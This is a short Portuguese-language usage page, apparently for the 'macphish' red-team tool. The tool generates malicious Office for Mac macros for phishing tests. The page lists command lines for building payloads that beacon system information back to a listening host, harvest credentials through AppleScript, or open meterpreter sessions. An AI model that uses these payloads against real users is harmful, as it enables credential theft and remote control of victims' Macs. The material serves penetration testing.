
Gera macros maliciosos do Office para Mac com beacons, coleta de credenciais e payloads meterpreter para testes de phishing e exploração no macOS.
Gerador de Payload de Macro para Office no Mac

Há 4 vetores de ataque disponíveis:
Para o método 'creds', o macphish pode gerar o script Applescript diretamente, caso você precise executá-lo a partir de um shell.
Ao ser executado, este payload sinalizará nosso host de escuta e fornecerá informações básicas do sistema sobre a vítima. A maneira mais simples de gerar um payload beacon é:
$./macphish.py -lh <listening host>
Por padrão, ele usa curl, mas outros utilitários (wget, nslookup) podem ser usados modificando o modelo de comando.
$./macphish.py -lh <listening host> -lp <listening port> -a creds
A maneira mais simples de gerar um payload meterpreter é:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
Para gerar um payload meterpreter que chama GrantAccessToMultipleFiles() primeiro:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
Para ataques meterpreter, apenas payloads em python são suportados no momento.
Veja https://github.com/cldrn/macphish/wiki/Usage